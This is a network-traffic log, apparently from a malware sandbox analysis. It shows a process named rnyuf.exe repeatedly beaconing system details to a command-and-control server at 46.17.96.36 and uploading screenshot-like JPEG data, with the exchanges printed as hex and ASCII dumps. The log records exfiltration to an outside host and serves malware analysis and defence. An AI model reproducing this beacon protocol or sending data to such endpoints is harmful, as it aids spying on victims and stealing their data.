                                        Aug 29, 2021 22:28:03.322896957 CEST12506OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:03.322956085 CEST12508OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:03.323373079 CEST12516OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:03.323604107 CEST12519OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:28:03.324461937 CEST12520OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:28:03.325066090 CEST12526OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:03.356502056 CEST12536OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:03.459754944 CEST12595INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        172192.168.2.44991146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:03.535959959 CEST12596OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:03.608139038 CEST12596INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:03.699312925 CEST12597OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:03.699377060 CEST12597OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:03.699523926 CEST12607OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:03.699598074 CEST12609OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:03.734952927 CEST12618OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:03.735047102 CEST12631OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:03.735816002 CEST12636OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:03.770742893 CEST12652OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:03.770808935 CEST12660OUTData Raw: 51 57 3e c4 68 fb 11 a3 d9 cb b0 bd ac 4a 74 0a b9 f6 16 a5 fb 0b 51 ec a5 d8 3d ac 7b 94 e9 45 5c fb 03 53 85 83 53 54 a4 2f 6b 1e e5 1a 5a b9 f6 16 cd 2f d8 18 d3 f6 52 17 b5 8f 72 9d 1c 55 cf b0 35 2f d8 0d 3f 65 20 f6 b1 ee 52 a0 d5 d1 60 d4
                                        Data Ascii: QW>hJtQ={E\SST/kZ/RrU5/?e R`e!{X(W/qO;)UZQZc.uE_>Q={)xi4Uem}%i4fZ=-j&HOja_X+a>>hz z
                                        Aug 29, 2021 22:28:03.771054029 CEST12676OUTData Raw: ff 00 84 6b 5f 92 c1 65 69 23 da 24 8d 9d 0a 36 d3 9c 64 10 0e 78 ad a9 56 e7 d1 ee 63 56 97 26 ab 63 0c 75 a7 f6 a6 53 bb 57 42 30 61 de 9e 29 29 d5 44 b2 c5 95 a4 fa 85 f5 bd 95 ac 7e 65 c5 c4 ab 14 49 90 37 3b 10 00 c9 e0 72 7b d7 61 ff 00 0a
                                        Data Ascii: k_ei#$6dxVcV&cuSWB0a))D~eI7;r{a??gZT~C+iSH6Q7Tuo~,P;uG&8$#$BN'T7CLK;o9LH~.fUM?
                                        Aug 29, 2021 22:28:03.771166086 CEST12686OUTData Raw: 06 b3 d3 40 d0 fc 96 d4 de 2d 4f ec 0d a3 1d 49 2d 0d cc 6b 3a b0 9c 43 83 27 96 41 53 92 c0 ec 19 18 ac fd a5 2b 5e df d6 bf e4 ca 54 ea 3e a4 7f f0 b2 fc 63 ff 00 43 0d ef fd f4 3f c2 99 27 c4 7f 17 4b 1b 47 26 bf 78 e8 e0 ab 2b 30 20 83 d4 11
                                        Data Ascii: @-OI-k:C'AS+^T>cC?'KG&x+0 ~+a3pfk%H;(|+pOC4Om==iJo9K9>z}?9'wbX;4sd*cqUMl,N|#guUbnT_
                                        Aug 29, 2021 22:28:03.877320051 CEST12704INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        173192.168.2.44991246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:03.836005926 CEST12704OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:03.908984900 CEST12704INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        174192.168.2.44991346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.121618986 CEST12705OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:04.193305016 CEST12719INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        175192.168.2.44991446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.171104908 CEST12706OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:04.171350956 CEST12706OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:04.171379089 CEST12716OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:04.171494007 CEST12719OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:04.206326962 CEST12722OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:04.206557989 CEST12725OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:04.206727028 CEST12727OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:04.206757069 CEST12739OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:04.206780910 CEST12742OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:04.206796885 CEST12744OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:04.241787910 CEST12747OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:04.363234043 CEST12814INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        176192.168.2.44991546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.365880966 CEST12814OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:04.456003904 CEST12814INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        177192.168.2.44991646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.677036047 CEST12815OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:04.750861883 CEST12854INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        178192.168.2.44991746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:04.689029932 CEST12816OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:04.689127922 CEST12816OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:04.689295053 CEST12826OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:04.689378023 CEST12829OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
